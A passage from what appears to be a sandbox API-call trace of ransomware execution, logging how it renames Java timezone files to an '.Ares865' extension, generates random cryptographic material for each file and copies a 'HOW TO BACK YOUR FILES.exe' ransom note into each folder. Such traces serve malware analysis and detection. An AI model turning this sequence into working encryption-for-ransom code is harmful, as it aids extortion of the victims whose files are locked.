(x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-4" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-4"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-4.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-4.ares865"), dwFlags=0x1) returned 1 [0134.229] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-4.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.229] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.229] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.230] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.230] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.235] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.235] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.235] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.236] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT-5" | out: lpString1="GMT-5") returned="GMT-5" [0134.236] lstrlenW (lpString="GMT-5") returned 5 [0134.236] lstrlenW (lpString="Ares865") returned 7 [0134.236] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-5.Ares865") returned 57 [0134.236] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-5" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-5"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-5.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-5.ares865"), dwFlags=0x1) returned 1 [0134.238] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-5.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-5.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.238] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.238] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.239] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.239] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.241] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.242] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.242] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.243] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT-6" | out: lpString1="GMT-6") returned="GMT-6" [0134.243] lstrlenW (lpString="GMT-6") returned 5 [0134.243] lstrlenW (lpString="Ares865") returned 7 [0134.243] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-6.Ares865") returned 57 [0134.243] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-6" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-6"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-6.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-6.ares865"), dwFlags=0x1) returned 1 [0134.245] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-6.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-6.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.245] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.245] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.246] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.246] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.248] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.249] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.249] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.249] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT-7" | out: lpString1="GMT-7") returned="GMT-7" [0134.249] lstrlenW (lpString="GMT-7") returned 5 [0134.249] lstrlenW (lpString="Ares865") returned 7 [0134.250] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-7.Ares865") returned 57 [0134.250] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-7" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-7"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-7.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-7.ares865"), dwFlags=0x1) returned 1 [0134.251] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-7.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-7.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.252] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.252] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.252] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.253] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.255] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.256] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.256] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.256] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT-8" | out: lpString1="GMT-8") returned="GMT-8" [0134.256] lstrlenW (lpString="GMT-8") returned 5 [0134.257] lstrlenW (lpString="Ares865") returned 7 [0134.257] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-8.Ares865") returned 57 [0134.257] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-8" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-8"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-8.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-8.ares865"), dwFlags=0x1) returned 1 [0134.258] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-8.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-8.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.258] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.259] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.259] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.259] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.262] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.262] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.262] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.263] lstrcpyW (in: lpString1=0x2cce458, lpString2="GMT-9" | out: lpString1="GMT-9") returned="GMT-9" [0134.263] lstrlenW (lpString="GMT-9") returned 5 [0134.263] lstrlenW (lpString="Ares865") returned 7 [0134.263] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-9.Ares865") returned 57 [0134.263] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-9" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-9"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-9.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-9.ares865"), dwFlags=0x1) returned 1 [0134.265] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-9.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-9.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.265] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.265] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.266] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.266] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.268] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.269] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.269] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.270] lstrcpyW (in: lpString1=0x2cce458, lpString2="UCT" | out: lpString1="UCT") returned="UCT" [0134.270] lstrlenW (lpString="UCT") returned 3 [0134.270] lstrlenW (lpString="Ares865") returned 7 [0134.270] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UCT.Ares865") returned 55 [0134.270] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UCT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\uct"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UCT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\uct.ares865"), dwFlags=0x1) returned 1 [0134.271] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UCT.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\uct.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.272] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.272] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.273] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.273] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.275] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.276] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.276] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.276] lstrcpyW (in: lpString1=0x2cce458, lpString2="UTC" | out: lpString1="UTC") returned="UTC" [0134.276] lstrlenW (lpString="UTC") returned 3 [0134.276] lstrlenW (lpString="Ares865") returned 7 [0134.277] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UTC.Ares865") returned 55 [0134.277] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UTC" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\utc"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UTC.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\utc.ares865"), dwFlags=0x1) returned 1 [0134.278] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UTC.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\utc.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.279] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27) returned 1 [0134.279] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.280] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.280] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.283] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.284] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.284] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.284] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia" [0134.285] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia" [0134.285] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0134.285] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\how to back your files.exe"), bFailIfExists=1) returned 0 [0134.286] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0134.286] GetLastError () returned 0x0 [0134.286] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0134.286] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74613b80, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52b13ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52b13ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0134.286] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0134.286] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0134.287] lstrcpyW (in: lpString1=0x2cce464, lpString2="Adelaide" | out: lpString1="Adelaide") returned="Adelaide" [0134.287] lstrlenW (lpString="Adelaide") returned 8 [0134.287] lstrlenW (lpString="Ares865") returned 7 [0134.287] lstrcmpiW (lpString1="delaide", lpString2="Ares865") returned 1 [0134.287] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Adelaide.Ares865") returned 66 [0134.287] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Adelaide" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\adelaide"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Adelaide.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\adelaide.ares865"), dwFlags=0x1) returned 1 [0134.288] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Adelaide.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\adelaide.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.289] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1224) returned 1 [0134.289] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.289] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.290] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.292] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.292] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.292] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.293] lstrcpyW (in: lpString1=0x2cce464, lpString2="Brisbane" | out: lpString1="Brisbane") returned="Brisbane" [0134.293] lstrlenW (lpString="Brisbane") returned 8 [0134.293] lstrlenW (lpString="Ares865") returned 7 [0134.293] lstrcmpiW (lpString1="risbane", lpString2="Ares865") returned 1 [0134.293] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Brisbane.Ares865") returned 66 [0134.293] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Brisbane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\brisbane"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Brisbane.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\brisbane.ares865"), dwFlags=0x1) returned 1 [0134.295] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Brisbane.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\brisbane.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.295] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=189) returned 1 [0134.296] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.296] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.296] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.300] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.300] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.300] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.301] lstrcpyW (in: lpString1=0x2cce464, lpString2="Broken_Hill" | out: lpString1="Broken_Hill") returned="Broken_Hill" [0134.301] lstrlenW (lpString="Broken_Hill") returned 11 [0134.301] lstrlenW (lpString="Ares865") returned 7 [0134.301] lstrcmpiW (lpString1="en_Hill", lpString2="Ares865") returned 1 [0134.301] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Broken_Hill.Ares865") returned 69 [0134.301] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Broken_Hill" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\broken_hill"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Broken_Hill.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\broken_hill.ares865"), dwFlags=0x1) returned 1 [0134.303] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Broken_Hill.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\broken_hill.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.303] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1224) returned 1 [0134.303] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.304] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.304] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.306] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.307] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.307] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.307] lstrcpyW (in: lpString1=0x2cce464, lpString2="Currie" | out: lpString1="Currie") returned="Currie" [0134.307] lstrlenW (lpString="Currie") returned 6 [0134.307] lstrlenW (lpString="Ares865") returned 7 [0134.308] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Currie.Ares865") returned 64 [0134.308] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Currie" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\currie"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Currie.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\currie.ares865"), dwFlags=0x1) returned 1 [0134.309] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Currie.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\currie.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.309] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1224) returned 1 [0134.310] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.310] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.310] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.313] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.314] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.314] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.314] lstrcpyW (in: lpString1=0x2cce464, lpString2="Darwin" | out: lpString1="Darwin") returned="Darwin" [0134.314] lstrlenW 